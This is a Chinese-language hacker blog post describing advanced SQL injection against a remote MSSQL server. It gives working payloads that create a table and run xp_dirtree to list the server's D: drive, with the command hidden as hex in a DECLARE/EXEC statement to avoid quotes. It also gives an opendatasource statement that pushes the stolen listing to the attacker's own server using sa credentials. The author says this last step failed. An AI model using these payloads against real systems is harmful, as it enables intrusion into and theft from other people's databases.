SQL注入高级技巧nowthk篇

直接打开本地数据库test中的ku表，嘿嘿，成功列出了远程所有数据库的名称。

下面来返回服务器上D盘下的目录，嘿嘿，为了求速度，我只列一级目录。

建一个表;create table temp(id nvarchar(255),num1 nvarchar(255))--成功

往表里插入所有各级数目录(一级目录为D盘根目录，二级就是下一层，三级依次类推),语句：;insert into temp(id,num1) exec master.dbo.xp_dirtree ’D:\’，有单引号，上面的语句肯定不成功，肯定要用declare附值变量，好了，我直接写语句：
DECLARE @S NVARCHAR(4000);SET @S=CAST(0x69006E007300650072007400200069006E0074006F002000740065006D0070002800690064002C006E0075006D00310029002000650078006500630020006D00610073007400650072002E00640062006F002E00780070005F0064006900720074007200650065002000270044003A005C002700 AS NVARCHAR(4000));EXEC(@S);

那么现在temp表中，已经有了所有D盘的目录了，其中num1=1为一级目录,num1=2为二级..等等。

好了，我把temp表中一级目录返回到本地吧

本地建表mulu(name char(255)),远程语句:

insert into opendatasource(’sqloledb’,’server=211.11.11.11;uid=sa;pwd=fuck!!;database=test’).test.dbo.mulu select id from temp where num1=1
转成16进制declare附变量提交，我日~~经过漫长由如死机的时间，失败了。。。弄不清楚原因，有知道的请联系我。
既然懒的方法不行，算了，就勤快一些吧！郁闷！